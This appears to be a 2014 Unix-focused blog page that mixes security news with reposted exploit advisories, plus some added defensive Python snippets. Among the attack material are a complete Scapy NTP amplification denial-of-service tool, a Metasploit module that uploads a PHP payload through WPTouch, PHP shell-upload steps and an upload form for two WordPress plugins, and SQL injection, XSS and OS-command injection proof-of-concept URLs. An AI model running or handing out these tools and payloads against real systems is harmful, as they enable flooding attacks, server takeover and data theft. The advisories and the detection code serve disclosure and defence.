MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

18 Jul 2014

Independence Key, maximum security and convenience for data protection


Data security is increasingly critical these days, especially in business environments. Think of industrial secrets, or of the confidential information held by professionals such as doctors and accountants.

In the past, data was stored only on paper and was easy to copy. Today technology, combined with extreme miniaturization, allows enormous quantities of data to be stored in the space of a few centimetres, or even millimetres.

This is the case with ordinary USB flash drives, which have one problem: they can be stolen, and their contents can be read by anyone. That problem does not affect the Independence Key, an encrypted USB drive based on AES 256, the most secure encryption system in the world, also used by the United States government.

It is really simple and fast to use: thanks to the 100 Mbps offered by the TPM chip built into the drive, encryption takes place in real time and transparently to the user.
Storing data in the Cloud is no problem either. The generated keys are unique and always travel with the data, wherever it goes.

And what if the drive is lost or stolen? No problem, because the Independence Key comes with the exclusive Security Cap, a small device that plugs into the extra USB port on the drive and acts as an (encrypted) backup of the data.

The Security Cap is bound to the drive permanently, at the hardware level, allowing the data to be recovered. Keep in mind that nobody, not even Quantec (the manufacturer of the Independence Key), can recover the data, apart from the rightful owner.

If you need to share your data with others, no problem: the "Crypt & Share" function lets you do so with other users of the drive.
It is even possible to create a network through which data can be shared securely, without having to set up VPNs.

Using the Cloud (services such as Dropbox, SkyDrive etc.) is also completely safe and protected.
You can create a fully encrypted disk that synchronizes only the differences with the Cloud storage, saving time and bandwidth.

The drive costs €250 + VAT, fully deserved for the functions offered. This is the link for further information.

Source: http://tecnologia.tiscali.it/articoli/news/sicurezza-informatica/14/06/independence-key-massima-sicurezza-e-comodita-per-la-protezione-dei-dati.html?news_sicurezza


18 Jul 2014

Using Android 4.3? Don't let malware steal your passwords


If you are among the 10.3% of Android users running version 4.3 (Jelly Bean), your login data is at risk because of a vulnerability in KeyStore, the operating system's cryptographic store that keeps keys and other sensitive data.

A team of IBM researchers discovered that the program is vulnerable through a stack-based buffer overflow attack, which in practice means malicious code could be executed to seize the phone's credentials and thereby access personal data on the device.

Attackers would nonetheless need uncommon skills to pull this off.
First they would have to defeat Android's protective software layers, the ones that prevent unauthorized apps from executing code, and then get past the address space layout randomization. Difficult, but not impossible.

The researchers had already reported the vulnerability to Google's Android security team last September, and that team released a patch in KitKat (Android 4.4) two months later.
The result is that only users of this latest Android version are safe, while anyone with a device running Jelly Bean, Gingerbread, Ice Cream Sandwich or Froyo is still at risk.

KitKat is currently installed on 13.6% of Android-based devices, which means the remaining 86.4% could have problems. Hopefully Google will release a fix for those too, even though a successful attack against your own smartphone is really unlikely.

In the meantime it is advisable to install only apps downloaded from the Google Play Store, to check whether updates have been released for your device, and to install trustworthy anti-malware/antivirus apps.

Source: http://tecnologia.tiscali.it/articoli/news/sicurezza-informatica/14/07/usate-android-43-non-fatevi-rubare-le-password.html?news_sicurezza

18 Jul 2014

Joomla Youtube Gallery 4.1.7 SQL Injection

# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960
 
Detail:
At line 40 of components\com_youtubegallery\models\gallery.php, if the
parameter listid is an int (or can be cast to int), $listid and $themeid
are not sanitized: the check uses getInt(), but the values are then fetched
again with getVar() as raw strings.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:        //Shadow Box
43:        $listid=JRequest::getVar('listid');
44:
45:
46:        //Get Theme
47:         $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:         if($m_themeid!=0)
49:         {
50:              if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:                    $themeid=$m_themeid;
52:              else
53:                    $themeid=JRequest::getVar('themeid');
54:              }
55:          else
56:               $themeid=JRequest::getVar('themeid');
57: }
Afterwards, $themeid and $listid are used at lines 86 and 92. The two methods
getVideoListTableRow and getThemeTableRow concatenate strings to build the
SQL query, so the component is vulnerable to SQL injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88:         echo '<p>No video found</p>';
89:         return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94:          echo '<p>No video found</p>';
95:          return false;
96: }
 
# Site PoC: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
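Why the getInt() gate at line 40 does not protect the raw values, modelled in Python as an added example (not code from the advisory or from the component): php_intval stands in for PHP's (int) cast, unsanitized_after_gate reports which parameters reach the concatenated query unchanged, and hardened_theme_lookup shows the fix, using the cast integer with a bound parameter against a constructed in-memory SQLite table.

```python
import re
import sqlite3

# Constructed stand-in for PHP's (int) cast, which JRequest::getInt() relies on:
# the leading numeric prefix is kept and everything after it is dropped, so "1'" -> 1.
# Simplified: exponent notation such as "1e3" is not handled.
def php_intval(value):
    m = re.match(r"\s*[+-]?\d+", value or "")
    return int(m.group()) if m else 0

def passes_getint_gate(params):
    """Models the check at gallery.php line 40: if(JRequest::getInt('listid'))."""
    return php_intval(params.get("listid")) != 0

def unsanitized_after_gate(params):
    """Names of the parameters that reach the string concatenation in
    getVideoListTableRow / getThemeTableRow as raw getVar() strings even though
    the gate passed. A value is reported when its raw form differs from its
    integer form, i.e. it carries characters the gate never looked at."""
    if not passes_getint_gate(params):
        return []
    return [name for name in ("listid", "themeid")
            if str(php_intval(params.get(name))) != (params.get(name) or "").strip()]

def make_theme_db():
    # Constructed in-memory table standing in for the component's theme table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE themes (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO themes VALUES (1, 'default')")
    return conn

def hardened_theme_lookup(conn, params):
    """Hardened handling: use the cast integers everywhere and bind the value
    instead of concatenating it. Returns the matching row or None."""
    listid = php_intval(params.get("listid"))
    themeid = php_intval(params.get("themeid"))
    if listid == 0 or themeid == 0:
        return None
    return conn.execute("SELECT id, name FROM themes WHERE id = ?", (themeid,)).fetchone()

# Constructed query parameters mirroring the advisory's PoC (listid=1&themeid=1')
POC_PARAMS = {"listid": "1", "themeid": "1'"}

if __name__ == "__main__":
    print("gate passes:", passes_getint_gate(POC_PARAMS))
    print("raw values reaching SQL:", unsanitized_after_gate(POC_PARAMS))
    print("hardened lookup:", hardened_theme_lookup(make_theme_db(), POC_PARAMS))
```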


17 Jul 2014

Botnets infecting 18 systems per second, warns FBI


Criminals are developing increasingly sophisticated attack strategies that let them infect as many as 18 systems per second with their botnet armies, according to the FBI.

FBI assistant director Joseph Demarest revealed the statistic while briefing a Senate sub-committee about the agency's current and future anti-cyber crime strategy on Tuesday. He said the news is troubling as the botnets' high infection rate costs the US and global economies billions of dollars.

"The use of botnets is on the rise. Industry experts estimate that botnet attacks have resulted in the overall loss of millions of dollars from financial institutions and other major US businesses," he said.

"The impact of this global cyber threat has been significant. Botnets have caused over $9bn in losses to US victims and over $110bn in losses globally. Approximately 500 million computers are infected globally each year, translating into 18 victims per second."

Demarest added this is doubly troubling as many of the botnets are currently rentable and could be used by a variety of criminals or terrorist organisations.

"As you well know, we face cyber threats from state-sponsored hackers, hackers for hire, organised cyber syndicates and terrorists. They seek our state secrets, our trade secrets, our technology and our ideas – things of incredible value to all of us," he said.

"They may seek to strike our critical infrastructure and our economy. The threat is so dire that cyber security has topped the Director of National Intelligence's list of global threats for the second consecutive year."

The FBI assistant director's claim follows the discovery of a new Energetic Bear hack campaign targeting critical infrastructure. The threat was so severe that at the start of July the US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) issued a warning urging firms involved in critical infrastructure to check their systems.

Demarest said the FBI is already developing new technologies and techniques to help mitigate the growing threat, but argued that increased collaboration between law enforcement agencies and the public and private sector is needed to deal with the problem.

"The FBI's overall goal is to remove, reduce, and prevent cyber crime by attacking the threat through the identification of the most significant cyber criminal actors. Our success can only be attained through co-ordination of our overall cyber criminal strategy amongst all FBI Cyber Division's existing and emerging entities," he said.

"The FBI cyber criminal strategy also includes working closely with our international partners to develop a holistic assessment of the threat posed by cyber criminals and organisations to partner countries.

"Through this collaborative process, the FBI hopes to launch aggressive and comprehensive mitigation strategies through joint investigations and operational partnerships with law enforcement partners, private industry, and academia."

Demarest highlighted the success of the recent international Gameover Zeus takedown as proof of his claim. "In June 2014, the FBI announced a multinational effort to disrupt the Gameover Zeus botnet, the most sophisticated botnet that the FBI and its allies had ever attempted to disrupt," he said.

"This effort to disrupt it involved impressive co-operation with the private sector and international law enforcement. The FBI is proud of these successes, but we recognise that we must constantly strive to be more efficient and effective. Just as our adversaries continue to evolve, so too must the FBI."

Experts within the security community have been less positive about the Gameover Zeus operation, though. Speaking to V3 after the takedown many warned the operation could spur the botnet's owners to develop more dangerous attack strategies.

The warnings proved right on 11 July when an evolved, more resilient version of the Gameover Zeus botnet was discovered.

Source: http://www.v3.co.uk/v3-uk/news/2355596/botnets-infecting-18-systems-per-second-warns-fbi


17 Jul 2014

NTP Amplification Denial Of Service Tool

#!/usr/bin/env python
from scapy.all import *
import sys
import threading
import time
#NTP Amp DOS attack
#by DaRkReD
#usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10
 
#packet sender
def deny():
  #Import globals to function
  global ntplist
  global currentserver
  global data
  global target
  ntpserver = ntplist[currentserver] #Get new server
  currentserver = currentserver + 1 #Increment for next 
  packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT
  send(packet,loop=1) #SEND IT
 
#So I dont have to have the same stuff twice
def printhelp():
  print "NTP Amplification DOS Attack"
  print "By DaRkReD"
  print "Usage ntpdos.py <target ip> <ntpserver list> <number of threads>"
  print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
  print "NTP serverlist file should contain one IP per line"
  print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
  exit(0)
 
if len(sys.argv) < 4:
  printhelp()
#Fetch Args
target = sys.argv[1]
 
#Help out idiots
if target in ("help","-h","h","?","--h","--help","/?"):
  printhelp()
 
ntpserverfile = sys.argv[2]
numberthreads = int(sys.argv[3])
#System for accepting bulk input
ntplist = []
currentserver = 0
with open(ntpserverfile) as f:
    ntplist = f.readlines()
 
#Make sure we dont out of bounds
if  numberthreads > int(len(ntplist)):
  print "Attack Aborted: More threads than servers"
  print "Next time dont create more threads than servers"
  exit(1)
 
#Magic Packet aka NTP v2 Monlist Packet
data = "\x17\x00\x03\x2a" + "\x00" * 4
 
#Hold our threads
threads = []
print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"
print "Use CTRL+C to stop attack"
 
#Thread spawner
for n in range(numberthreads):
    thread = threading.Thread(target=deny)
    thread.daemon = True
    thread.start()
 
    threads.append(thread)
 
#In progress!
print "Sending..."
 
#Keep alive so ctrl+c still kills all them threads
while True:
  time.sleep(1)
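Seen from the reflector's side, the only thing worth spotting in that script is its "magic packet": an NTP mode-7 MON_GETLIST_1 request. The parser below is an added example (not the tool's code) that decodes the mode-7 header from raw UDP/123 payloads and flags monlist probes; the constructed samples are the tool's 8-byte packet, a normal NTPv4 client request and a mode-7 reply.

```python
from dataclasses import dataclass

MODE_PRIVATE = 7          # NTP "private" mode used by ntpdc
IMPL_XNTPD = 3            # implementation number carried in the tool's packet
REQ_MON_GETLIST = 20      # MON_GETLIST
REQ_MON_GETLIST_1 = 42    # MON_GETLIST_1, the 0x2a in the tool's magic packet

@dataclass
class Mode7Header:
    response: bool      # R bit: set on replies from the server
    more: bool          # M bit: more response packets follow
    version: int        # 3-bit version field
    auth: bool          # A bit: request carries authentication
    sequence: int       # 7-bit sequence number
    implementation: int
    request_code: int

def parse_mode7(payload):
    """Decode the 8-byte mode-7 header. Returns None for anything that is not a
    mode-7 packet (ordinary mode-3 client requests, mode-4 server replies, ...)."""
    if len(payload) < 8:
        return None
    b0, b1, impl, req = payload[0], payload[1], payload[2], payload[3]
    if (b0 & 0x07) != MODE_PRIVATE:
        return None
    return Mode7Header(
        response=bool(b0 & 0x80),
        more=bool(b0 & 0x40),
        version=(b0 >> 3) & 0x07,
        auth=bool(b1 & 0x80),
        sequence=b1 & 0x7F,
        implementation=impl,
        request_code=req,
    )

def is_monlist_request(payload):
    """True for an unanswered (R bit clear) MON_GETLIST / MON_GETLIST_1 request,
    i.e. the probe an amplification script aims at a reflector."""
    hdr = parse_mode7(payload)
    return (hdr is not None and not hdr.response
            and hdr.request_code in (REQ_MON_GETLIST, REQ_MON_GETLIST_1))

def count_monlist_requests(payloads):
    """Count monlist probes in a batch of UDP/123 payloads (e.g. pulled from a pcap)."""
    return sum(1 for p in payloads if is_monlist_request(p))

# Constructed samples: the tool's magic packet, a normal NTPv4 client request
# (LI=0, VN=4, mode=3 -> 0x23, 48 bytes) and a mode-7 reply (R bit set).
MONLIST_PROBE = b"\x17\x00\x03\x2a" + b"\x00" * 4
CLIENT_REQUEST = b"\x23" + b"\x00" * 47
MONLIST_REPLY = b"\x97\x00\x03\x2a" + b"\x00" * 4

# Mitigation on the reflector (ntp.conf): "disable monitor" switches the MRU list
# off and "restrict default kod nomodify notrap nopeer noquery" refuses mode 6/7
# queries, so the probe above gets no answer and there is nothing to amplify.
if __name__ == "__main__":
    print(parse_mode7(MONLIST_PROBE))
    print("monlist probes:", count_monlist_requests([MONLIST_PROBE, CLIENT_REQUEST, MONLIST_REPLY]))
```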


16 Jul 2014

WordPress WPTouch Authenticated File Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress WPTouch Authenticated File Upload',
      'Description'    => %q{
          The Wordpress WPTouch plugin contains an authenticated file upload
          vulnerability. A wp-nonce (CSRF token) is created on the backend index
          page and the same token is used on handling ajax file uploads through
          the plugin. By sending the captured nonce with the upload, we can
          upload arbitrary files to the upload folder. Because the plugin also
          uses its own file upload mechanism instead of the wordpress api it's
          possible to upload any file type.
          The user provided does not need special rights. Also users with "Contributor"
          role can be abused.
      },
      'Author'         =>
        [
          'Marc-Alexandre Montpas', # initial discovery
          'Christian Mehlmauer'     # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['wptouch < 3.4.3', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 14 2014'))
 
    register_options(
      [
        OptString.new('USER', [true, "A valid username", nil]),
        OptString.new('PASSWORD', [true, "Valid password for the provided username", nil]),
      ], self.class)
  end
 
  def user
    datastore['USER']
  end
 
  def password
    datastore['PASSWORD']
  end
 
  def check
    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wptouch', 'readme.txt')
    res = send_request_cgi({
      'uri'    => readme_url,
      'method' => 'GET'
    })
    # no readme.txt present
    if res.nil? || res.code != 200
      return Msf::Exploit::CheckCode::Unknown
    end
 
    # try to extract version from readme
    # Example line:
    # Stable tag: 2.6.6
    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
 
    # readme present, but no version number
    if version.nil?
      return Msf::Exploit::CheckCode::Detected
    end
 
    vprint_status("#{peer} - Found version #{version} of the plugin")
 
    if Gem::Version.new(version) < Gem::Version.new('3.4.3')
      return Msf::Exploit::CheckCode::Appears
    else
      return Msf::Exploit::CheckCode::Safe
    end
  end
 
  def get_nonce(cookie)
    res = send_request_cgi({
      'uri'    => wordpress_url_backend,
      'method' => 'GET',
      'cookie' => cookie
    })
 
    # forward to profile.php or other page?
    if res and res.code.to_s =~ /30[0-9]/ and res.headers['Location']
      location = res.headers['Location']
      print_status("#{peer} - Following redirect to #{location}")
      res = send_request_cgi({
        'uri'    => location,
        'method' => 'GET',
        'cookie' => cookie
      })
    end
 
    if res and res.body and res.body =~ /var WPtouchCustom = {[^}]+"admin_nonce":"([a-z0-9]+)"};/
      return $1
    else
      return nil
    end
  end
 
  def upload_file(cookie, nonce)
    filename = "#{rand_text_alpha(10)}.php"
 
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"myfile\"; filename=\"#{filename}\"")
    data.add_part('homescreen_image', nil, nil, 'form-data; name="file_type"')
    data.add_part('upload_file', nil, nil, 'form-data; name="action"')
    data.add_part('wptouch__foundation__logo_image', nil, nil, 'form-data; name="setting_name"')
    data.add_part(nonce, nil, nil, 'form-data; name="wp_nonce"')
    post_data = data.to_s
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => wordpress_url_admin_ajax,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data,
      'cookie'   => cookie
    })
 
    if res and res.code == 200 and res.body and res.body.length > 0
      register_files_for_cleanup(filename)
      return res.body
    end
 
    return nil
  end
 
  def exploit
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
 
    print_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    if nonce.nil?
      print_error("#{peer} - Can not get nonce after login")
      return
    end
    print_status("#{peer} - Got nonce #{nonce}")
 
    print_status("#{peer} - Trying to upload payload")
    file_path = upload_file(cookie, nonce)
    if file_path.nil?
      print_error("#{peer} - Error uploading file")
      return
    end
 
    print_status("#{peer} - Calling uploaded file #{file_path}")
    res = send_request_cgi({
      'uri'    => file_path,
      'method' => 'GET'
    })
  end
end


15 Jul 2014

WordPress DZS Video Gallery XSS / Path Disclosure / Command Execution

These are Cross-Site Scripting, Full path disclosure and OS Commanding 
vulnerabilities in plugin DZS Video Gallery for WordPress.
 
Earlier I've disclosed Content Spoofing and Cross-Site Scripting 
vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html).
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are all versions of DZS Video Gallery for WordPress.
 
-------------------------
Affected vendors:
-------------------------
 
Digital Zoom Studio
http://digitalzoomstudio.net
 
----------
Details:
----------
 
Cross-Site Scripting (WASC-08):
 
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/dzs-videogallery/videogallery.php
 
http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php
 
FPD is in the PHP files of the plugin (by default) or in error_log, in all folders 
of the plugin. The affected files vary depending on the version of the plugin.
 
OS Commanding (WASC-31):
 
http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)
 
RCE using method of Pichaya Morimoto 
(http://seclists.org/fulldisclosure/2014/Jun/117).
 
------------
Timeline:
------------ 
 
2014.05.08 - announced at my site.
2014.05.09 - informed the developer, but he ignored it.
2014.07.12 - disclosed at my site (http://websecurity.com.ua/7152/).
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


15 Jul 2014

WordPress Tidio Gallery 1.1 Shell Upload / XSS

######################
# Exploit Title : Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.tidioelements.com/
 
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
 
# Date : 2014-07-14
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Location :  
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
 
 
######################
 
# Vulnerability n°1:
 
XSS Reflected Unauthenticated
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
 
# Vulnerability n°2:
 
An unprivileged user such as a subscriber can upload a shell script.
The plugin renames the uploaded file using the PHP expression "md5(microtime())". 
 
1) Connect to url: http://VICTIM/wp-admin/admin-ajax.php?action=tidio_gallery_popup_insert_post
 
2) Click "add gallery" button
 
3) Click "edit" option
 
4) Click "add image" button
 
5) Click "upload" option and select php shell from local drive
 
6) Refresh page (ex. press F5 key)
 
7) View source page (ex. right-click -> view source page) and search string like this: 
   "fileUrl":"http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php"
   Skip file with "*-thumb.php" extension.
 
8) Open browser and connect to http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php
 
 
#####################
 
Discovered By : Claudio Viviani
    http://www.homelab.it
    info@homelab.it
 
    https://www.facebook.com/homelabit
    https://twitter.com/homelabit
    https://plus.google.com/+HomelabIt1/
 
#####################


15 Jul 2014

WordPress CopySafe PDF Protection 0.6 Shell Upload

##################################################################################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload vulnerability
#Author        : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected :  0.6 and below
#Date          : 14/07/2014
#Discovered at : IndiShell Lab
#Love to       : Surbhi, Mradula and Harry
##################################################################################################
 
////////////////////////
/// Overview:
////////////////////////
  The Wordpress plugin CopySafe PDF Protection (up to version 0.6) suffers 
from an unrestricted file upload vulnerability which allows an attacker to 
upload a malicious PHP shell to the server.
To avoid exploitation, update the plugin to version 0.7.
 
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
The vulnerability is in the file lib/uploadify/uploadify.php, which performs 
no check during file upload: it accepts both the file and the upload path 
from the request.
An attacker needs to send a file upload request to this file with a PHP 
shell and the file upload path.
 
 
///////////////////////
///  exploit code  ////
///////////////////////
 
 
<form 
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php" 
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>
 
Save this code on your machine as exploit.html, open exploit.html in a web 
browser, browse to your PHP shell and click the submit button.
 
The shell will be uploaded to the uploads directory:
http://website.com/wp-content/uploads/shell.php
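The WPTouch module above, the Tidio Gallery steps and the CopySafe form all end the same way: a PHP file is served from wp-content/uploads. The access-log scanner below is an added example, not code from any of the advisories, run over a constructed combined-format log; the paths and action names are the ones quoted in those three sections, and the hardening it assumes is that the web server refuses to execute PHP under the uploads tree.

```python
import re
from collections import namedtuple

# Apache/nginx "combined"-style access log line (constructed format assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

Finding = namedtuple("Finding", "ip ts rule method path status")

# What to look for, taken from the three advisories. The WPTouch upload itself is
# a POST to admin-ajax.php with the action in the multipart body, so only the
# follow-up request for the dropped .php file is visible in an access log.
RULES = (
    ("php-in-uploads",
     re.compile(r"^/wp-content/uploads/.*\.php(\?.*)?$", re.I)),
    ("copysafe-uploadify-post",
     re.compile(r"^/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify\.php", re.I)),
    ("tidio-popup-insert-post",
     re.compile(r"^/wp-admin/admin-ajax\.php\?.*\baction=tidio_gallery_popup_insert_post\b", re.I)),
)

def parse_line(line):
    """Split one log line into its fields, or None when it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def scan(lines):
    """One Finding per log line whose request path matches a rule (first rule wins)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for rule, pattern in RULES:
            if pattern.search(rec["path"]):
                findings.append(Finding(rec["ip"], rec["ts"], rule, rec["method"],
                                        rec["path"], int(rec["status"])))
                break
    return findings

def executed_uploads(findings):
    """PHP under wp-content/uploads that was actually served (status 200): the
    strongest signal that a dropped file ran. With PHP execution denied in that
    tree (e.g. a deny rule for uploads/*.php), these requests would show as 403."""
    return [f for f in findings if f.rule == "php-in-uploads" and f.status == 200]

# Constructed sample log (documentation-range IPs; last two lines are benign/blocked).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jul/2014:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.5 - - [15/Jul/2014:10:00:07 +0000] "POST /wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php HTTP/1.1" 200 64
203.0.113.5 - - [15/Jul/2014:10:00:09 +0000] "GET /wp-content/uploads/shell.php HTTP/1.1" 200 312
198.51.100.9 - - [15/Jul/2014:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=tidio_gallery_popup_insert_post HTTP/1.1" 200 2048
198.51.100.9 - - [15/Jul/2014:10:01:30 +0000] "GET /wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php HTTP/1.1" 200 87
192.0.2.44 - - [15/Jul/2014:10:02:00 +0000] "GET /wp-content/uploads/2014/07/photo.jpg HTTP/1.1" 200 40213
192.0.2.44 - - [15/Jul/2014:10:02:05 +0000] "GET /wp-content/uploads/old.php HTTP/1.1" 403 199
""".splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
    print("served PHP from uploads:", len(executed_uploads(scan(SAMPLE_LOG))))
```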


12 Jul 2014

WordPress Compfight 1.4 Cross Site Scripting

######################
# Exploit Title : Wordpress Compfight 1.4 Authenticated Cross Site Scripting
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip
 
# Date : 2014-07-03
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php
 
######################
 
# Vulnerable code :
 
  if (!$search_value) {
      $input_text = 'Enter Keyword(s)';
    } else {
      $input_text = $search_value;
    }
 
    if ($show_title) {
      $output .= '<h3 class="cf_search_title">Compfight</h3>';
      $output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>';
    }
 
    $output .= '<form method="GET" action="" id="cf-form">';
    $output .= '<input type="text" name="search-value" id="search-value" value="' . $input_text . '" onClick="javascript:if(this.value==\'Enter Keyword(s)\') { this.value = \'\'; };" />';
    $output .= '<input type="submit" name="search" id="search" value="Search" class="button" />';
    $output .= '</form>';
 
The $input_text variable is written into the value attribute without sanitization.
 
######################
 
Exploit Code:
 
http://localhost/plugins/compfight/compfight-search.php?search-value='"/><script>alert(1);</script>&search=Search
 
 
#####################
 
Discovered By : Claudio Viviani
    http://www.homelab.it
    info@homelab.it
 
    https://www.facebook.com/homelabit
    https://twitter.com/homelabit
    https://plus.google.com/+HomelabIt1/
 
#####################
